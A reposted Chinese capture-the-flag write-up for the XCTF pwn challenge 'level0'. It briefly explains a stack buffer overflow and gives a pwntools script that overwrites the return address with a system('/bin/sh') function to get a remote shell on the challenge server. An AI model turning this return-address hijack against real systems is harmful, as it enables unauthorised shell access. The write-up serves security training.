[攻防世界 pwn]——level0
生活随笔
收集整理的這篇文章主要介紹了
[攻防世界 pwn]——level0
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[攻防世界 pwn]——level0
- 題目地址: https://adworld.xctf.org.cn/
- 題目:
checksec看下保護類型,開啟了NX保護
IDA中看下,發現了system("/bin/sh")函數,返回地址修改為該函數就可以
exploit
from pwn import * #p = process("./pwn") p = remote("111.200.241.244",40322) sys_addr = 0x0400596payload = 'a'*(0x80+8) + p64(sys_addr) p.sendline(payload) p.interactive()總結
以上是生活随笔為你收集整理的[攻防世界 pwn]——level0的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [攻防世界 pwn]——hello_pw
- 下一篇: [攻防世界 pwn]——string(内